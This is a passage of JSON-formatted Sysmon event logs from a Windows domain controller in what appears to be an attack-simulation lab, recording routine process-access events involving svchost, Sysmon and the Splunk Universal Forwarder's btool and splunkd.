C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.177\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-00107B3F0500}\r\nProcessId: 2764\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nParentProcessId: 2504\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.177","ProcessGuid":"{41C8662E-1FF0-5F25-0000-00107B3F0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","ParentProcessId":"2504","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nSourceProcessId: 2504\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-00107B3F0500}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","SourceProcessId":"2504","SourceThreadId":"2852","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-00107B3F0500}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program 